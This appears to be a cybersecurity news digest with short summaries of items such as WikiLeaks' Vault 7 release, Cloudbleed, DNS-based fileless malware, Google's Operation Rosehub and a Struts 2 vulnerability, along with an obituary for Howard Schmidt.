News
WikiLeaks publishes Vault 7, collection of alleged CIA hacking tools
WikiLeaks has published a large set of hacking tools belonging to the CIA. Right now the dump only contains documentation, no actual malware or exploits. Their original announcement can be found here.
Cloudbleed triggered 1.2M times, damage kept to minimum
A look at the impact of the 'CloudBleed' vulnerability.
HackerOne offers open source projects free access to platform
HackerOne, the bug bounty platform, now offers its service free to open-source projects. To be eligible the project must be older than three months, active, and covered by an Open Source Initiative (OSI) license .
New fileless malware uses DNS queries to receive PowerShell commands
Interesting new malware was discovered that uses DNS as a command & control system. It will establish itself through a number of steps and fetch Powershell scripts written in DNS TXT records, while never actually writing a file to disk, making it hard to detect.
Google Open Source Blog: Operation Rosehub
Great story of how 50 Google employees banded together to patch all open-source projects on Github that were still vulnerable to the "Mad Gadget vulnerability", a remote code execution bug that recently hit the San Francisco Metro system. Over 2600 projects received a pull request to fix the issue.
Thou shalt not depend on me: analysing the use of outdated JavaScript libraries on the web
It's not surprising that a huge number of sites uses one or more Javascript libraries with known vulnerabilities. This articles gives an overview of how bad it actually is.
DHS funding new round of IoT cyber startups with total of $1M award
The Department of Homeland Security has awarded $200,000 to five startups with promising IoT security technology. They will be guided through further steps to build out their PoC's to a full product.
Pentagon launches open-source experiment
The US Defence Department has launched code.mil, a website that will be used to host unclassified code written by the department, and which will be free to use for personal or public projects.
Apple pushing two-factor authentication for iOS 10.3 users
Apple seems to be nudging users more explicitly to adopt 2fa in the latest iOS version, which is currently in beta.
Apache servers under attack through easily exploitable Struts 2 flaw
Struts 2, a Java web application framework, has a critical remote code execution vulnerability that is being exploited in the wild. Patching is advised.
In Appreciation: Howard A. Schmidt
Howard Schmidt, who was the top cybersecurity advisor for both Bush and Obama, has passed away. Reading about what he did and what kind of person he was, he will clearly be missed.